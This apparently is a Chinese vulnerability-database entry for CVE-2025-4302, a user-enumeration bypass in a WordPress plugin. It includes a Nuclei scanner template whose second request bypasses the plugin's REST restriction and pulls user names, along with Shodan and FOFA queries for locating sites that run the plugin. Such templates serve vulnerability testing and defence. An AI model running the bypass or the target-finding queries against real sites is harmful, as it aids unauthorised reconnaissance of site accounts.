CVE-2025-4302: Stop User Enumeration WordPress plugin - Authentication Bypass

日期: 2025-11-11 | 影响软件: WordPress plugin | POC: 已公开

漏洞描述

Stop User Enumeration WordPress plugin < 1.7.3 contains an authentication bypass caused by URL-encoding the REST API path /wp-json/wp/v2/users/, letting attackers bypass user enumeration restrictions, exploit requires crafted URL encoding.

PoC代码[已公开]

id: CVE-2025-4302

info:
  name: Stop User Enumeration WordPress plugin - Authentication Bypass
  author: Kazgangap
  severity: medium
  description: |
    Stop User Enumeration WordPress plugin < 1.7.3 contains an authentication bypass caused by URL-encoding the REST API path /wp-json/wp/v2/users/, letting attackers bypass user enumeration restrictions, exploit requires crafted URL encoding.
  reference:
    - https://wpscan.com/vulnerability/19f67d6e-4ffe-4126-ac42-fb23c5017a3e/
    - https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-4302.md
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4302
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2025-4302
    epss-score: 0.01585
    epss-percentile: 0.81017
  metadata:
    verified: true
    vendor: fullworks
    product: stop-user-enumeration
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/stop-user-enumeration/"
    fofa-query: body=/wp-content/plugins/stop-user-enumeration/
    publicwww-query: "/wp-content/plugins/stop-user-enumeration/"
  tags: cve,cve2025,wordpress,wp-plugin,wp,wpscan,stop-user-enumeration,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users"

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Only authenticated users can access the User endpoint REST API")'
          - 'status_code==401'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users?foo=simple-jwt-login"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '{"id":\d,"name":".*","url"'

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210096169bfbdd45e3259b514c757b1617b9d646b8be01dd352e400b30de0e523f0e02207d4956bf5f95886cd57aff00f0d0fe6d3b0c223d157a85dbf7c3b23fc46ba720:922c64590222798bb761d5b6d8e72950

相关漏洞推荐